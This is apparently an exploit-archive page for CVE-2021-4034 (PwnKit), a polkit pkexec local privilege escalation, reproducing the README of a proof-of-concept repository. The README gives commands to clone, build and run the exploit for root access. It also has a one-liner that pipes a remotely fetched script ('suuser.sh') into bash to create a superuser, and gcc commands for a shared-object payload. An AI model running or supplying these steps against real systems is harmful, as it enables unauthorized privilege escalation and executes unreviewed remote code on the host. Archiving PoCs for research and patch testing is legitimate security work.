Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-4034 PoC — polkit 缓冲区错误漏洞

Source
Associated Vulnerability
Title:polkit 缓冲区错误漏洞 (CVE-2021-4034)
Description:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。
Description
CVE-2021-4034 PoC , polkit < 0.131
Readme
# poppy : CVE-2021-4034
CVE-2021-4034 PoC , polkit &lt; 0.131

## Usage

Tested on Arch Linux (Manjaro & Axyl OS)
```shell
git clone https://github.com/tahaafarooq/poppy
make
./poppy
```

**Super user creation exploit**

```shell
bash -c "$(curl -fsSL https://raw.githubusercontent.com/tahaafarooq/poppy/main/suuser.sh)"
```

```shell
gcc -shared su.c -o suuser -Wl,-e,entry -fPIC
./suuser
```


## POC
![anotherone](https://user-images.githubusercontent.com/49201347/151382446-242aa1f9-4eb9-40cf-98fb-a74aef95b668.png)

For more information about this vulnerability refer to the writeup https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
File Snapshot

[4.0K] /data/pocs/9ce7ff8adffac9f06046fd4b534bc59f91574a0f ├── [ 120] Makefile ├── [ 16K] poppy ├── [1.4K] poppy.c ├── [ 647] README.md ├── [1.0K] su.c ├── [ 323] su-o.c ├── [ 15K] suuser └── [ 152] suuser.sh 0 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.